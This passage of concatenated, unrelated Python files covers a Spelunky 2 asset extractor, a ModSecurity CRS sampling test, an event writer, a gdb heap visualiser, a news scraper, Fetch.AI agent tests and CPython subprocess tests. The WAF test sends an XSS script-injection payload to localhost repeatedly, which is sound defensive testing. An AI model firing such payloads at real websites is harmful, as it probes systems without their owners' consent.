logging.info("Extracting %s.. ", filepath)
asset.load_data(exe)
def extract_single(asset):
try:
logging.info("Extracting %s... ", asset.filename.decode())
asset.extract(install_dir / EXTRACTED_DIR, asset_store.key)
except Exception as err:
logging.error(err)
pool = ThreadPoolExecutor()
futures = [pool.submit(extract_single, asset) for asset in seen.values()]
wait(futures, timeout=300)
for asset in sorted(asset_store.assets, key=lambda a: a.offset):
name_hash = asset_store.filename_hash(asset.filename)
if asset.name_hash not in seen:
logging.warning("Un-extracted Asset %s. Things might not work. :X", asset)
dest = install_dir / EXTRACTED_DIR / "Spel2.exe"
if exe_filename != dest:
logging.info("Backing up exe to %s", dest)
shutil.copy2(exe_filename, dest)
logging.info("Extraction complete!")
@blueprint.route('/extract/', methods=["POST"])
def assets_extract():
exe = current_app.config.SPELUNKY_INSTALL_DIR / request.form['extract-target']
thread = threading.Thread(target=extract_assets, args=(current_app.config.SPELUNKY_INSTALL_DIR, exe))
thread.start()
return render_template("assets_extract.html", exe=exe)
def repack_assets(mods_dir, source_exe, dest_exe):
shutil.copy2(source_exe, dest_exe)
with dest_exe.open("rb+") as dest_file:
asset_store = AssetStore.load_from_file(dest_file)
try:
asset_store.repackage(Path(mods_dir))
except MissingAsset as err:
logging.error("Failed to find expected asset: %s. Unabled to proceed...", err)
return
patcher = Patcher(dest_file)
patcher.patch()
logging.info("Repacking complete!")
@blueprint.route('/repack/', methods=["POST"])
def assets_repack():
source_exe = current_app.config.SPELUNKY_INSTALL_DIR / EXTRACTED_DIR / "Spel2.exe"
dest_exe = current_app.config.SPELUNKY_INSTALL_DIR / "Spel2.exe"
mods_dir = current_app.config.SPELUNKY_INSTALL_DIR / ASSETS_ROOT
thread = threading.Thread(target=repack_assets, args=(mods_dir, source_exe, dest_exe))
thread.start()
return render_template("assets_repack.html", exe=dest_exe)
|
testSampling.py
|
from ftw import ruleset, http, errors
"""
This script assumes that default blocking action is 403
and sampling is one. It will send a know bad request
that is expected to be blocked. If sampling is on it
will only block a certain percentage. We send 1000
requests to verify this. In order to do this we must
also turn off IP Reputation blocking.
SecAction "id:900005,phase:1,nolog,pass,ctl:ruleEngine=on,ctl:ruleRemoveById=910000"
"""
def send_requests(input_data,subiters,result,index):
http_ua = http.HttpUA()
for i in range(0,subiters):
new_index = str(index)+str(i)
http_ua.send_request(input_data)
result[new_index] = http_ua.response_object.status
def run_requests(iterations):
"""Post request with no content-type AND no content-length"""
x = ruleset.Input(method="GET", protocol="http",port=80,uri='/?X="><script>alert(1);</script>',dest_addr="localhost",headers={"Host":"localhost","User-Agent":"ModSecurity CRS 3 test"})
import threading
returns = {}
threads = []
for i in range(5):
t = threading.Thread(target=send_requests,args=(x,100, returns,i,))
threads.append(t)
t.start()
for t in threads:
t.join()
status_not_403 = 0
status_403 = 0
for status in returns.values():
if status == 403:
status_403 += 1
else:
status_not_403 += 1
x = (status_403/(len(returns)*1.0))*100
y = (status_not_403/(len(returns)*1.0))*100
print "403s =", x
print "not 403s =", y
return (x,y)
def test_sampling():
print "running"
block,passed = run_requests(100)
assert block < 55 and block > 45
|
event_writer.py
|
import Queue
import multiprocessing
import threading
import sys
from collections import Iterable
from .common import log
class EventWriter(object):
def __init__(self, process_safe=False):
if process_safe:
self._mgr = multiprocessing.Manager()
self._event_queue = self._mgr.Queue(1000)
else:
self._event_queue = Queue.Queue(1000)
self._event_writer = threading.Thread(target=self._do_write_events)
self._event_writer.daemon = True
self._started = False
self._exception = False
def start(self):
if self._started:
return
self._started = True
self._event_writer.start()
log.logger.info("Event writer started.")
def tear_down(self):
if not self._started:
return
self._started = False
self._event_queue.put(None)
self._event_writer.join()
log.logger.info("Event writer stopped.")
def isopen(self):
return self._started and (not self._exception)
def write_events(self, events):
if not self.isopen():
return False
if events is None:
return True
self._event_queue.put(events)
return True
def _do_write_events(self):
event_queue = self._event_queue
write = sys.stdout.write
got_shutdown_signal = False
while 1:
try:
event = event_queue.get(timeout=3)
if event is not None:
if isinstance(event, basestring):
write(event)
elif isinstance(event, Iterable):
for evt in event:
write(evt)
else:
log.logger.info("Event writer got tear down signal")
got_shutdown_signal = True
except Queue.Empty:
# We need to drain the queue before shutdown
# timeout means empty for now
if got_shutdown_signal:
log.logger.info("Event writer is going to exit...")
break
else:
continue
except Exception:
log.logger.exception("EventWriter encounter exception which may"
"cause data loss, queue leftsize={"
"}".format(
event_queue.qsize()))
self._exception = True
break
log.logger.info("Event writer stopped, queue leftsize={}".format(
event_queue.qsize()))
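# Hedged usage sketch (not part of the original module): start a thread-backed
# writer, push a couple of events to stdout and shut it down cleanly. The
# helper name and sample events are illustrative.
def _demo_event_writer():
    writer = EventWriter(process_safe=False)
    writer.start()
    writer.write_events(["event one\n", "event two\n"])
    writer.tear_down()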
|
vheap.py
|
from aiohttp import web
import threading
import asyncio
import socketio
import json
import sys
# GLOBALS #
loop = None # Thread loop
sio = None # Socket io
serving = False # To hold status of server
binsheads = {} # To hold bins heads
binschunks = {} # To hold bins chunks
vPath = "" # To hold viewsPath
# Defaults
gport = 8080
ghost = "localhost"
'''
HTTP server handler: handles page and JS file requests
'''
def aiohttp_server():
global sio, app
sio = socketio.AsyncServer()
def index(request):
with open('{}vheap.html'.format(vPath)) as f:
return web.Response(text=f.read(), content_type='text/html')
def jsfile(request):
global ghost, gport
with open('{}static/js/'.format(vPath) + request.match_info['name']) as f:
# Fixes JS files GHOST, GPORT before returning (To avoid CORS errors)
return web.Response(text=f.read().replace("GHOST", ghost).replace("GPORT",gport),
content_type='text/javascript');
'''
on connect: do nothing
'''
@sio.on('connect')
async def connected(sid, msg):
pass
'''
on getHeap: send heap data to client
'''
@sio.on('getHeap')
async def getHeap(sid, msg):
await sio.emit("heapData", vheap_makeHeapData())
# Create http server, and socket io
app = web.Application()
sio.attach(app)
# router
app.router.add_get('/', index)
app.router.add_get(r'/static/js/{name}', jsfile)
handler = web.AppRunner(app)
return handler
'''
Http Server thread runner
'''
def vheap_serve_thread(handler):
global serving, ghost, gport, loop
if serving:
return
# gdb sometimes hands these over as None, so fall back to the defaults
if str(ghost) == "None" or str(gport) == "None":
ghost = "localhost"
gport = 8080
serving = True
print("vHeap is now serving on http://" + ghost + ":" + str(gport))
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(handler.setup())
site = web.TCPSite(handler, ghost, gport)
loop.run_until_complete(site.start())
loop.run_forever()
'''
Starts serving vHeap thread
'''
def vheap_serve(host="localhost", port=8080):
global serving, ghost, gport, viewPath
if not serving:
ghost = host
gport = port
t = threading.Thread(target=vheap_serve_thread, args=(aiohttp_server(),))
t.start()
'''
Stops serving vHeap thread
'''
def vheap_stop():
global loop
if serving:
loop.call_soon_threadsafe(loop.stop)
'''
Clears the heap heads, bins
'''
def vheap_clearHeap():
global binsheads, binschunks
binsheads = {}
binschunks = {}
'''
Adds a bin head to the heads dict with its value
'''
def vheap_addBinHead(head, address):
global binsheads
binsheads[head] = address
'''
Adds a chunks to a specific bin
'''
def vheap_addChunkToBin(bin, chunk):
global binschunks
if not bin in binschunks:
binschunks[bin] = []
binschunks[bin].append(chunk)
'''
Combines heads with bins as json text, ready to be sent to client
'''
def vheap_makeHeapData():
global binsheads, binschunks
ret = { "heads": binsheads, "bins": binschunks }
return json.dumps(ret)
'''
Makes a chunk struct
'''
def vheap_makeChunk(index, address, prevSize, chunkSize, a, m, p, fd, bk):
chunk = {
"index": index,
"address": address,
"prevSize": prevSize,
"chunkSize": chunkSize,
"a": a,
"m": m,
"p": p,
"fd": fd,
"bk": bk
}
return chunk
# Init welcome #
vPath = __file__.replace("vheap.py", "vheapViews/")
vheap_clearHeap()
vheap_addBinHead("vHeap is ready", "0x200")
|
main.py
|
from gnewsclient import gnewsclient
from urllib.request import urlopen,Request
from bs4 import BeautifulSoup
from tqdm import tqdm
import json
import pandas as pd
import threading
def search_news(lang,loc,topicc,no_of_results):
# search for news articles
client = gnewsclient.NewsClient(language=lang,
location=loc,
topic=topicc,
max_results=no_of_results)
news_list = client.get_news()
return(news_list)
def extract_text(url):
# given the url of a news article extract all textual content from it
text = ""
try:
req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
html = urlopen(req).read()
soup = BeautifulSoup(html, features="html.parser")
# kill all script and style elements
for script in soup(["script", "style"]):
script.extract() # rip it out
# get text
text = soup.get_text()
# break into lines and remove leading and trailing space on each
lines = (line.strip() for line in text.splitlines())
# break multi-headlines into a line each
chunks = (phrase.strip() for line in lines for phrase in line.split(" "))
# drop blank lines
text = '\n'.join(chunk for chunk in chunks if chunk)
except Exception as e:
i = 0
return(text)
def extract_bunch(li,start,end,folder,checkpoint_duration,thread_id):
# extract text from a set of articles
# this is called by each thread
dic = {}
for i in tqdm(range(start,end)):
row = li[i]
if(row[4]=='en'):
row.append(extract_text(row[3]))
dic[i] = row
if i%checkpoint_duration==0:
start_str = str(start)
checkpoint = str(i)
with open(folder + "\\"+str(thread_id)+"_output.json", "w",encoding = "UTF-16") as outfile:
json.dump(dic, outfile)
with open(folder + "\\"+str(thread_id)+"_output.json", "w",encoding = "UTF-16") as outfile:
json.dump(dic, outfile)
return
# input csv file
input_csv = 'news.csv'
df = pd.read_csv(input_csv)
li = df.values.tolist()
nli = []
for r in li:
if r[4] =='en':
nli.append(r)
li = nli
ind = 0
dic = {}
# path to output folder
output_folder = "output\\"
# total number of threads
no_of_threads = 10
# limit the number of articles to search by setting tasks to, say, 100
# 100 can be any number < total headlines
tasks = len(li)
per_thread = tasks//no_of_threads
# checkpoint duration, set the number after which checkpoints are made, 100 is a good number
checkpoint_duration = 100
threads = []
for i in range(0,no_of_threads):
ti = threading.Thread(target=extract_bunch, args=(li,i*per_thread,min((i+1)*per_thread,tasks),output_folder,checkpoint_duration,i))
ti.start()
threads.append(ti)
for thread in threads:
thread.join()
|
test_aea.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests for aea/aea.py."""
import os
import tempfile
import time
from pathlib import Path
from threading import Thread
import pytest
from aea import AEA_DIR
from aea.aea import AEA
from aea.aea_builder import AEABuilder
from aea.configurations.base import PublicId
from aea.crypto.fetchai import FETCHAI
from aea.crypto.ledger_apis import LedgerApis
from aea.crypto.wallet import Wallet
from aea.identity.base import Identity
from aea.mail.base import Envelope
from aea.protocols.base import Protocol
from aea.protocols.default.message import DefaultMessage
from aea.protocols.default.serialization import DefaultSerializer
from aea.registries.resources import Resources
from aea.skills.base import Skill
from packages.fetchai.connections.local.connection import LocalNode
from packages.fetchai.protocols.fipa.message import FipaMessage
from packages.fetchai.protocols.fipa.serialization import FipaSerializer
from .conftest import (
CUR_PATH,
DUMMY_SKILL_PUBLIC_ID,
ROOT_DIR,
UNKNOWN_PROTOCOL_PUBLIC_ID,
_make_local_connection,
)
from .data.dummy_aea.skills.dummy.tasks import DummyTask # type: ignore
from .data.dummy_skill.behaviours import DummyBehaviour # type: ignore
def test_initialise_aea():
"""Tests the initialisation of the AEA."""
private_key_path = os.path.join(CUR_PATH, "data", "fet_private_key.txt")
builder = AEABuilder()
builder.set_name("my_name").add_private_key(FETCHAI, private_key_path)
my_AEA = builder.build()
assert my_AEA.context == my_AEA._context, "Cannot access the Agent's Context"
assert (
not my_AEA.context.connection_status.is_connected
), "AEA should not be connected."
my_AEA.setup()
assert my_AEA.resources is not None, "Resources must not be None after setup"
my_AEA.resources = Resources(str(Path(CUR_PATH, "aea")))
assert my_AEA.resources is not None, "Resources must not be None after set"
assert (
my_AEA.context.shared_state is not None
), "Shared state must not be None after set"
assert my_AEA.context.task_manager is not None
assert my_AEA.context.identity is not None, "Identity must not be None after set."
my_AEA.stop()
def test_act():
"""Tests the act function of the AEA."""
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", "fet_private_key.txt")
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(FETCHAI, private_key_path)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
agent = builder.build()
t = Thread(target=agent.start)
try:
t.start()
time.sleep(1.0)
behaviour = agent.resources.get_behaviour(DUMMY_SKILL_PUBLIC_ID, "dummy")
assert behaviour.nb_act_called > 0, "Act() wasn't called"
finally:
agent.stop()
t.join()
def test_react():
"""Tests income messages."""
with LocalNode() as node:
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", "fet_private_key.txt")
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(FETCHAI, private_key_path)
builder.add_connection(
Path(ROOT_DIR, "packages", "fetchai", "connections", "local")
)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
agent = builder.build(connection_ids=[PublicId.from_str("fetchai/local:0.1.0")])
# This is a temporary workaround to feed the local node to the OEF Local connection
# TODO remove it.
list(agent._connections)[0]._local_node = node
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
msg.counterparty = agent.identity.address
message_bytes = DefaultSerializer().encode(msg)
envelope = Envelope(
to=agent.identity.address,
sender=agent.identity.address,
protocol_id=DefaultMessage.protocol_id,
message=message_bytes,
)
t = Thread(target=agent.start)
try:
t.start()
time.sleep(1.0)
agent.outbox.put(envelope)
time.sleep(2.0)
default_protocol_public_id = DefaultMessage.protocol_id
dummy_skill_public_id = DUMMY_SKILL_PUBLIC_ID
handler = agent.resources.get_handler(
default_protocol_public_id, dummy_skill_public_id
)
assert handler is not None, "Handler is not set."
assert (
msg in handler.handled_messages
), "The message is not inside the handled_messages."
except Exception:
raise
finally:
agent.stop()
t.join()
@pytest.mark.asyncio
async def test_handle():
"""Tests handle method of an agent."""
with LocalNode() as node:
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", "fet_private_key.txt")
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(FETCHAI, private_key_path)
builder.add_connection(
Path(ROOT_DIR, "packages", "fetchai", "connections", "local")
)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
aea = builder.build(connection_ids=[PublicId.from_str("fetchai/local:0.1.0")])
# This is a temporary workaround to feed the local node to the OEF Local connection
# TODO remove it.
list(aea._connections)[0]._local_node = node
t = Thread(target=aea.start)
try:
t.start()
time.sleep(2.0)
dummy_skill = aea.resources.get_skill(DUMMY_SKILL_PUBLIC_ID)
dummy_handler = dummy_skill.handlers["dummy"]
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
message_bytes = DefaultSerializer().encode(msg)
envelope = Envelope(
to=aea.identity.address,
sender=aea.identity.address,
protocol_id=UNKNOWN_PROTOCOL_PUBLIC_ID,
message=message_bytes,
)
# send envelope via localnode back to agent
aea.outbox.put(envelope)
time.sleep(2.0)
assert len(dummy_handler.handled_messages) == 1
# DECODING ERROR
envelope = Envelope(
to=aea.identity.address,
sender=aea.identity.address,
protocol_id=DefaultMessage.protocol_id,
message=b"",
)
# send envelope via localnode back to agent
aea.outbox.put(envelope)
time.sleep(2.0)
assert len(dummy_handler.handled_messages) == 2
# UNSUPPORTED SKILL
msg = FipaSerializer().encode(
FipaMessage(
performative=FipaMessage.Performative.ACCEPT,
message_id=1,
dialogue_reference=(str(0), ""),
target=0,
)
)
envelope = Envelope(
to=aea.identity.address,
sender=aea.identity.address,
protocol_id=FipaMessage.protocol_id,
message=msg,
)
# send envelope via localnode back to agent
aea.outbox.put(envelope)
time.sleep(2.0)
assert len(dummy_handler.handled_messages) == 3
finally:
aea.stop()
t.join()
class TestInitializeAEAProgrammaticallyFromResourcesDir:
"""Test that we can initialize the agent by providing the resource object loaded from dir."""
@classmethod
def setup_class(cls):
"""Set the test up."""
cls.node = LocalNode()
cls.node.start()
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", "fet_private_key.txt")
builder = AEABuilder()
builder.set_name(agent_name)
builder.add_private_key(FETCHAI, private_key_path)
builder.add_connection(
Path(ROOT_DIR, "packages", "fetchai", "connections", "local")
)
builder.add_skill(Path(CUR_PATH, "data", "dummy_skill"))
cls.aea = builder.build(
connection_ids=[PublicId.from_str("fetchai/local:0.1.0")]
)
list(cls.aea._connections)[0]._local_node = cls.node
cls.expected_message = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
cls.expected_message.counterparty = cls.aea.identity.address
envelope = Envelope(
to=cls.aea.identity.address,
sender=cls.aea.identity.address,
protocol_id=DefaultMessage.protocol_id,
message=DefaultSerializer().encode(cls.expected_message),
)
cls.t = Thread(target=cls.aea.start)
cls.t.start()
time.sleep(0.5)
cls.aea.outbox.put(envelope)
time.sleep(0.5)
def test_initialize_aea_programmatically(self):
"""Test that we can initialize an AEA programmatically."""
dummy_skill_id = DUMMY_SKILL_PUBLIC_ID
dummy_behaviour_name = "dummy"
dummy_behaviour = self.aea.resources.get_behaviour(
dummy_skill_id, dummy_behaviour_name
)
assert dummy_behaviour is not None
assert dummy_behaviour.nb_act_called > 0
# TODO the previous code caused an error:
# _pickle.PicklingError: Can't pickle <class 'tasks.DummyTask'>: import of module 'tasks' failed
dummy_task = DummyTask()
task_id = self.aea.task_manager.enqueue_task(dummy_task)
async_result = self.aea.task_manager.get_task_result(task_id)
expected_dummy_task = async_result.get(2.0)
assert expected_dummy_task.nb_execute_called > 0
dummy_handler = self.aea.resources.get_handler(
DefaultMessage.protocol_id, dummy_skill_id
)
dummy_handler_alt = self.aea.resources._handler_registry.fetch(
(dummy_skill_id, "dummy")
)
assert dummy_handler == dummy_handler_alt
assert dummy_handler is not None
assert len(dummy_handler.handled_messages) == 1
assert dummy_handler.handled_messages[0] == self.expected_message
@classmethod
def teardown_class(cls):
"""Tear the test down."""
cls.aea.stop()
cls.t.join()
cls.node.stop()
class TestInitializeAEAProgrammaticallyBuildResources:
"""Test that we can initialize the agent by building the resource object."""
@classmethod
def setup_class(cls):
"""Set the test up."""
cls.node = LocalNode()
cls.node.start()
cls.agent_name = "MyAgent"
cls.private_key_path = os.path.join(CUR_PATH, "data", "fet_private_key.txt")
cls.wallet = Wallet({FETCHAI: cls.private_key_path})
cls.ledger_apis = LedgerApis({}, FETCHAI)
cls.identity = Identity(cls.agent_name, address=cls.wallet.addresses[FETCHAI])
cls.connection = _make_local_connection(cls.agent_name, cls.node)
cls.connections = [cls.connection]
cls.temp = tempfile.mkdtemp(prefix="test_aea_resources")
cls.resources = Resources(cls.temp)
cls.default_protocol = Protocol.from_dir(
str(Path(AEA_DIR, "protocols", "default"))
)
cls.resources.add_protocol(cls.default_protocol)
cls.error_skill = Skill.from_dir(str(Path(AEA_DIR, "skills", "error")))
cls.dummy_skill = Skill.from_dir(str(Path(CUR_PATH, "data", "dummy_skill")))
cls.resources.add_skill(cls.dummy_skill)
cls.resources.add_skill(cls.error_skill)
cls.aea = AEA(
cls.identity,
cls.connections,
cls.wallet,
cls.ledger_apis,
resources=cls.resources,
)
cls.error_skill.skill_context.set_agent_context(cls.aea.context)
cls.dummy_skill.skill_context.set_agent_context(cls.aea.context)
default_protocol_id = DefaultMessage.protocol_id
cls.expected_message = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
cls.expected_message.counterparty = cls.agent_name
cls.t = Thread(target=cls.aea.start)
cls.t.start()
time.sleep(0.5)
cls.aea.outbox.put(
Envelope(
to=cls.agent_name,
sender=cls.agent_name,
protocol_id=default_protocol_id,
message=DefaultSerializer().encode(cls.expected_message),
)
)
def test_initialize_aea_programmatically(self):
"""Test that we can initialize an AEA programmatically."""
time.sleep(0.5)
dummy_skill_id = DUMMY_SKILL_PUBLIC_ID
dummy_behaviour_name = "dummy"
dummy_behaviour = self.aea.resources.get_behaviour(
dummy_skill_id, dummy_behaviour_name
)
assert dummy_behaviour is not None
assert dummy_behaviour.nb_act_called > 0
dummy_task = DummyTask()
task_id = self.aea.task_manager.enqueue_task(dummy_task)
async_result = self.aea.task_manager.get_task_result(task_id)
expected_dummy_task = async_result.get(2.0)
assert expected_dummy_task.nb_execute_called > 0
dummy_handler_name = "dummy"
dummy_handler = self.aea.resources._handler_registry.fetch(
(dummy_skill_id, dummy_handler_name)
)
dummy_handler_alt = self.aea.resources.get_handler(
DefaultMessage.protocol_id, dummy_skill_id
)
assert dummy_handler == dummy_handler_alt
assert dummy_handler is not None
assert len(dummy_handler.handled_messages) == 1
assert dummy_handler.handled_messages[0] == self.expected_message
@classmethod
def teardown_class(cls):
"""Tear the test down."""
cls.aea.stop()
cls.t.join()
cls.node.stop()
Path(cls.temp).rmdir()
class TestAddBehaviourDynamically:
"""Test that we can add a behaviour dynamically."""
@classmethod
def setup_class(cls):
"""Set the test up."""
agent_name = "MyAgent"
private_key_path = os.path.join(CUR_PATH, "data", "fet_private_key.txt")
wallet = Wallet({FETCHAI: private_key_path})
ledger_apis = LedgerApis({}, FETCHAI)
resources = Resources()
resources.add_component(Skill.from_dir(Path(CUR_PATH, "data", "dummy_skill")))
identity = Identity(agent_name, address=wallet.addresses[FETCHAI])
cls.input_file = tempfile.mkstemp()[1]
cls.output_file = tempfile.mkstemp()[1]
cls.agent = AEA(
identity,
[_make_local_connection(identity.address, LocalNode())],
wallet,
ledger_apis,
resources,
)
for skill in resources.get_all_skills():
skill.skill_context.set_agent_context(cls.agent.context)
cls.t = Thread(target=cls.agent.start)
cls.t.start()
time.sleep(1.0)
def test_add_behaviour_dynamically(self):
"""Test the dynamic registration of a behaviour."""
dummy_skill_id = PublicId("dummy_author", "dummy", "0.1.0")
dummy_skill = self.agent.resources.get_skill(dummy_skill_id)
assert dummy_skill is not None
new_behaviour = DummyBehaviour(
name="dummy2", skill_context=dummy_skill.skill_context
)
dummy_skill.skill_context.new_behaviours.put(new_behaviour)
time.sleep(1.0)
assert new_behaviour.nb_act_called > 0
assert len(self.agent.resources.get_behaviours(dummy_skill_id)) == 2
@classmethod
def teardown_class(cls):
"""Tear the class down."""
cls.agent.stop()
cls.t.join()
Path(cls.input_file).unlink()
Path(cls.output_file).unlink()
|
test_subprocess.py
|
import unittest
from test.support import script_helper
from test import support
import subprocess
import sys
import signal
import io
import locale
import os
import errno
import tempfile
import time
import re
import selectors
import sysconfig
import warnings
import select
import shutil
import gc
import textwrap
try:
import threading
except ImportError:
threading = None
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
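# SETBINARY is prepended to the child code in the universal-newlines tests
# below; on Windows it switches the child's stdout to binary mode so the C
# runtime does not translate '\n' into '\r\n', keeping the byte sequences
# under test deterministic. On other platforms no switch is needed.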
try:
mkstemp = tempfile.mkstemp
except AttributeError:
# tempfile.mkstemp is not available
def mkstemp():
"""Replacement for mkstemp, calling mktemp."""
fname = tempfile.mktemp()
return os.open(fname, os.O_RDWR|os.O_CREAT), fname
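# The fallback above only matters on builds where tempfile.mkstemp is missing;
# opening a mktemp()-generated name with O_CREAT is inherently racy, which is
# acceptable for test-only scratch files.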
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
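# Passing co_argcount + 1 positional arguments guarantees a TypeError no
# matter how many parameters Popen.__init__ grows over time, and
# captured_stderr verifies that Popen.__del__ stays silent even though
# __init__ never finished (the issue #12085 regression).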
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
